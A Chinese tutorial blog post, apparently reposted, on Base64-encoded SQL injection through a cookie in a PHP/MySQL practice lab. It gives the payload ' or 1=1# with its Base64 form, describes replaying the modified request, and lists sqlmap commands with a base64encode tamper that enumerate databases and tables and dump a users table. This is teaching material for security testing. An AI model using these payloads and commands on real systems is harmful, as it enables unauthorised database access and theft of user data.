我是靠谱客的博主 干净铃铛,最近开发中收集的这篇文章主要介绍MySQL Cookie Base64注入,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

MySQL Cookie Base64注入

1.Base64介绍

Base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。Base64是网络上最常见的用于8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。

将原始内容转换为二进制,从左到右一次取6位,然后在最高位补两位0,形成新的内容。

编码规则:
(1)把3个字符变成4个字符。
(2)每76个字符加一个换行符。
(3)最后的结束符也要处理。

2.Cookie Base64注入代码分析

base64_decode(str):PHP语言中用于解密Base64加密字符串的函数。
在这里插入图片描述

3.Cookie Base64注入

使用Base64加密的注入语句,插入到cookie对应的位置完成SQL注入漏洞的探测
明文:' or 1=1#
密文:JyBvciAxPTE=
在这里插入图片描述
进行抓包
在这里插入图片描述
进行重放攻击
在这里插入图片描述
可以看到,cookie中的uname内容为base64编码,进行admin测试
在这里插入图片描述
可以看到回显的报错
在这里插入图片描述
后续操作,只需将我们要执行的SQL语句进行base64加密即可,这里就不在赘述。
若还有不懂的,请查看我的另外一篇博客
https://blog.csdn.net/m_de_g/article/details/121783580?spm=1001.2014.3001.5501

4.Sqlmap渗透测试

1.抓包复制其内容,并且在cookie的位置加上星号(*)
在这里插入图片描述
2.爆破数据库

python2 sqlmap.py -r "1.txt" --level 3 --batch

在这里插入图片描述
3.如果不加上参数的话会出现,报错

python2 sqlmap.py -r "1.txt" --level 3 --batch --tamper base64encode.py --dbs

在这里插入图片描述
4.爆破数据表

python2 sqlmap.py -r "1.txt" --level 3 --batch --tamper base64encode.py -D security --tables

在这里插入图片描述
5.获取字段名及内容

python2 sqlmap.py -r "1.txt" --level 3 --batch --tamper base64encode.py -D security -T users --dump

在这里插入图片描述

最后

以上就是干净铃铛为你收集整理的MySQL Cookie Base64注入的全部内容,希望文章能够帮你解决MySQL Cookie Base64注入所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(36)

评论列表共有 0 条评论

立即
投稿
返回
顶部